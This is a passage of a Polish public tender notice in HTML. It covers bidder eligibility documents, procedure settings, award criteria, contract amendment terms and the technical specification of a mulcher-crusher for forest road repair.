                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">9.2)	Potwierdzających brak podstaw wykluczenia wykonawcy z udziału w postępowaniu: 
1)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; 
2)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
3)	zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 
4)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy; 
5)	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo  w przypadku wydania takiego wyroku lub decyzji  dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności; 
6)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne; 
7)	oświadczenia wykonawcy o braku wydania prawomocnego wyroku sądu skazującego za wykroczenie na karę ograniczenia wolności lub grzywny w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy; 
8)	oświadczenia wykonawcy o braku wydania wobec niego ostatecznej decyzji administracyjnej o naruszeniu obowiązków wynikających z przepisów prawa pracy, prawa ochrony środowiska lub przepisów o zabezpieczeniu społecznym w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 7 ustawy; 
9)	oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716); 
10)	oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej; w przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
9.10.	Dokumenty podmiotów zagranicznych: 
a)	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów,
1)	o których mowa w pkt. 7.9.2 ppkt 1   składa informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 oraz ust. 5 pkt 5 i 6 ustawy; 
2)	7.9.2 ppkt 2-4  składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie zalega z opłacaniem podatków, opłat, składek na ubezpieczenie społeczne lub zdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
b)	nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
	Dokumenty, o których mowa w pkt 7.10 litera a. pkt 1 i pkt 2 litera b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. 
	Dokument, o którym mowa 7.10 litera a pkt. 2 litera a), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu. 
b)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. 7.10. a) zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Przepis ust. 2 stosuje się tj. dokumenty, o których mowa w pkt 7.10 litera a. pkt 1 i pkt 2 litera b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Dokument, o którym mowa 7.10 litera a pkt. 2 litera a), powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem tego terminu. 
c)	Wykonawca mający siedzibę na terytorium Rzeczypospolitej Polskiej, w odniesieniu do osoby mającej miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, której dotyczy dokument wskazany w 7.9.2.1 składa dokument, o którym mowa w 7.10.a pkt 1, w zakresie określonym w art. 24 ust. 1 pkt 14 i 21 oraz ust. 5 pkt 6 ustawy. Jeżeli w kraju, w którym miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie wydaje się takich dokumentów, zastępuje się go dokumentem zawierającym oświadczenie tej osoby złożonym przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na miejsce zamieszkania tej osoby. Przepis § 7 ust. 2 zdanie pierwsze Rozporządzenia ministra Rozwoju z dnia 26 lipca 2016 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia (Dz.U.2016.1126) stosuje się. tj. Dokumenty, o których mowa w pkt 7.10 litera a. pkt 1 i pkt 2 litera b, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu
7.11.	W celu oceny, czy wykonawca polegając na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, zamawiający będzie żądał dokumentów, które określają w szczególności: 
1)	zakres dostępnych wykonawcy zasobów innego podmiotu; 
2)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego; 
3)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego; 

7.12.	Zamawiający żąda od wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na zasadach określonych w art. 22a ustawy, przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w 7.9. 2 ppkt. 1-9. 
7.13.	Zamawiający żąda od wykonawcy przedstawienia dokumentów wymienionych w 7.9.2 ppkt. 1-9. dotyczących podwykonawcy, któremu zamierza powierzyć wykonanie części zamówienia, a który nie jest podmiotem, na którego zdolnościach lub sytuacji wykonawca polega na zasadach określonych w art. 22a ustawy. 
7.14	W przypadku wskazania przez wykonawcę dostępności oświadczeń lub dokumentów, o których mowa w 7.9.1, 7.9.2, 7.10 w formie elektronicznej pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz danych, zamawiający pobiera samodzielnie z tych baz danych wskazane przez wykonawcę oświadczenia lub dokumenty. 
7.15.	W przypadku wskazania przez wykonawcę oświadczeń lub dokumentów, o których mowa w 7.9.1, 7.9.2, 7.10, które znajdują się w posiadaniu zamawiającego, w szczególności oświadczeń lub dokumentów przechowywanych przez zamawiającego zgodnie z art. 97 ust. 1 ustawy, zamawiający w celu potwierdzenia okoliczności, o których mowa w art. 25 ust. 1 pkt 1 i 3 ustawy, korzysta z posiadanych oświadczeń lub dokumentów, o ile są one aktualne. 
7.16	Wykonawca wpisany do urzędowego wykazu zatwierdzonych wykonawców lub wykonawca certyfikowany przez jednostki certyfikujące spełniające wymogi europejskich norm certyfikacji może złożyć zaświadczenie o wpisie do urzędowego wykazu wydane przez właściwy organ lub certyfikat wydany przez właściwą jednostkę certyfikującą kraju, w którym wykonawca ten ma siedzibę lub miejsce zamieszkania, wskazujące na dokumenty stanowiące podstawę wpisu lub uzyskania certyfikacji, w miejsce odpowiednich dokumentów wymienionych w pkt. 7.9.1. oraz 7.9.2.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">9.	Na ofertę składają się:
a)	Wypełniony formularz ofertowy  sporządzony wg wzoru stanowiącego załącznik nr 1 do SIWZ.
b)	Opis przedmiotu zamówienia (wypełniony załącznik nr 2) 
c)	oświadczenie, o którym mowa w Rozdziale  7 pkt. 7.1, 7.2, 7.3, 7.4 
d)	w przypadku powoływania się na zasoby podmiotów trzecich - zobowiązanie tych podmiotów 
e)	oświadczenie umożliwiające dokonanie oceny ofert w kryterium gwarancji - na formularzu oferty.
f)	oświadczenie o terminie płatności - na formularzu ofertowym 
g)	pełnomocnictwo (oryginał lub notarialnie potwierdzona kopia)  w przypadku, gdy upoważnienie do podpisania oferty nie wynika z dokumentów rejestrowych. W przypadku podmiotów wspólnie ubiegających się  o zamówienie pełnomocnictwo (oryginał lub notarialnie potwierdzona kopia)  do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin płatności</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />                                                                                       § 9
Istotne zmiany do umowy 
1.	Strony mają prawo do przedłużenia wykonania przedmiotu umowy o okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu realizacji umowy  w następujących sytuacjach:
1)	wystąpienia Siły wyższej (powódź, huragan, trzęsienie ziemi, śnieżyca, uderzenia pioruna, gradobicie, tąpnięcia górnicze, epidemie, pożary, wojna, zamieszki krajowe, strajki, szkody wyrządzone przez dzikie zwierzęta) uniemożliwiającej wykonanie przedmiotu Umowy zgodnie z jej postanowieniami. W takim przypadku wydłużenie terminu nastąpi o okres niezbędny do usunięcia skutków działania siły wyższej nie  dłużej jednak niż o 10 tygodni.
2.	W przypadku konieczności wprowadzenia zmian do umowy strona zainteresowana przekazuje drugiej stronie wniosek na piśmie na adres wskazany w umowie. 
3.	Wykonawca zobowiązany będzie do przekazania Zamawiającemu  wniosku dotyczącego zmiany Umowy wraz z opisem zdarzenia lub okoliczności stanowiących podstawę do żądania takiej zmiany.
4.	Wniosek, o którym mowa powyżej  powinien zostać przekazany niezwłocznie, jednakże nie później niż w terminie 5 dni roboczych od dnia, w którym Wykonawca dowiedział się, lub powinien dowiedzieć się o danym zdarzeniu lub okolicznościach. 
5.	Wszelkie zmiany Umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu Umowy, pod rygorem nieważności,.
6.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany Umowy następujące zmiany: 
1)	danych związanych z obsługą administracyjno-organizacyjną Umowy,
2)	danych teleadresowych, 
3)	danych rejestrowych,
4)	będące następstwem sukcesji uniwersalnej po jednej ze stron Umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/11/2016, godzina: 09:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>część pierwsza: rozdrabniarko  kruszarki przeznaczonej do remontu dróg leśnych<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>OPIS PRZEDMIOTU ZAMÓWIENIA
CZĘŚĆ PIERWSZA:
1.	Przedmiotem zamówienia jest Dostawa rorazdrabniarko  kruszarki przeznaczonej do remontu dróg leśnych o określonych przez Kupującego parametrach technicznych.
2.	Wskazane parametry są parametrami minimalnymi, które musi rorazdrabniarko  kruszarka spełniać. 

WYMAGANIA OGÓLNE	OPISAĆ PARAMETR (TAK/NIE)
Maszyna fabrycznie nowa	
Maszyna przystosowana do współpracy z ciągnikiem o mocy znamionowej wg normy ISO 14369 nie mniejszej jak 129 KW i nie większej jak 155 KW  	
Rok produkcji  2016	
Dopuszczony do pracy w Polsce i w krajach Unii Europejskiej	

WYMAGANIA EKSPLOATACYJNE:	OPISAĆ PARAMETR (TAK/NIE)
Miejsce pracy  drogi leśne, powierzchnie zrębowe, linie oddziałowe i pasy p. poż.	
Przeznaczony do:
a) Remontu, renowacji dróg leśnych (kamienistych i żwirowych)
b) Rozdrabniania pozostałości pozrębowych.
c) Mineralizacji pasów p.poż.
d) Udostępniania linii oddziałowych.
	
Przewidywany okres eksploatacji 10 lat.	

WYMAGANE GŁÓWNE PARAMETRY TECHNICZNE.:	OPISAĆ PARAMETR (TAK/NIE)
Szerokość robocza  2450 mm	
Szerokość całkowita 2900  3000mm	
Głębokość robocza nie mniejsza niż 250 mm	
Masa maszyny 1800 do 2000 kg.	
Maksymalne chwilowe zapotrzebowanie mocy nie większe niż 155 KW.	

WYMAGANE STANDARDOWE ELEMENTY WYBRANE Z KATALOGÓW OFEROWANYCH PRZEZ PRODUCENTÓW.:	OPISAĆ PARAMETR (TAK/NIE)
Elementy robocze stałe (noże, frezy) zamocowane do bębna roboczego w osadach ( z końcówkami widiowymi)    i obracające się wokół własnej osi  dla zapewnienia równomiernego ich zużycia (wymienne do pracy w lesie i na drogach).	
Średnica rotora roboczego  min. 500 mm	
Obroty rotora roboczego w kierunku współbieżnym	
Ilość elementów roboczych zapewniająca całkowite pokrycie rozdrabnianej powierzchni ( nie mniej niż          90 sztuk).	
Rama główna wzmocniona typu  HARDOX do pracy w ciężkich warunkach	
Napęd z przekładni głównej dwustronny poprzez przekładnie łańcuchowe, pracujące  w kąpieli olejowej.	
Wbudowane dwa sprzęgła hydrauliczne  przeciążeniowe do zabezpieczenia układu przeniesienia napędu na bęben roboczy.	
Przeciwnóż do kruszenia współbieżnego  i przeciwbieżnego, zamocowany w ramie maszyny.	
Regulacja głębokości mieszania kruszonej nawierzchni przy pomocy ustalania pozycji bębna ugniatającego, sterowanego oddzielnym układem hydraulicznym.	
Wyposażenie  wał teleskopowo - przegubowy (Cardana)  dostosowany do mocy ciągnika	
Urządzenie wyposażone jest we wszystkie niezbędne połączenia oraz końcówki umożliwiające podłączenie go do ciągników Valtra 180 i 190. 	

WYMAGANE WARUNKI GWARANCJI I OBSŁUGI POGWARANCYJNEJ:	OPISAĆ PARAMETR (TAK/NIE)
Gwarancji udziela Wykonawca zamówienia na okres nie krótszy jak 24 miesiące.	
Wykonawca zabezpieczy serwis techniczny w miejscu pracy przedmiotu zamówienia.	
Udzielona gwarancja obejmuje wady fizyczne i prawne rzeczy sprzedanej w rozumieniu przepisów kodeksu cywilnego	
Wykonawca zobowiązany jest do wskazania w złożonej ofercie autoryzowanego przedstawiciela do zapewnienia kompleksowego serwisu gwarancyjnego i pogwarancyjnego oraz zabezpieczenia części zamiennych.	

WYMAGANA DOKUMENTACJA PRZY DOSTAWIE:	OPISAĆ PARAMETR (TAK/NIE)
Instrukcja eksploatacji i obsługi w języku polskim.	
Książka serwisowa	
Karta gwarancyjna	
Katalog części zamiennych	
Deklaracja zgodności CE/WE dopuszczająca kruszarkę do obrotu na terenie na terenie Unii Europejskiej	
Szczegółowa dokumentacja techniczna, folder i zdjęcie oferowanego przedmiotu zamówienia.	




WYMAGANE SZKOLENIE:	OPISAĆ PARAMETR (TAK/NIE)
W miejscu dostawy maszyny wskazanym przez Zamawiającego, Wykonawca przeprowadzi szkolenie dla dwóch
operatorów w zakresie obsługi, bezpieczeństwa Pracy i konserwacji.          Czas trwania szkolenia  jeden dzień roboczy podzielony na część teoretyczną i praktyczną.	
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>43300000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 30<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Gwarancja</td><td>30</td></tr><tr><td>Termin płatności</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
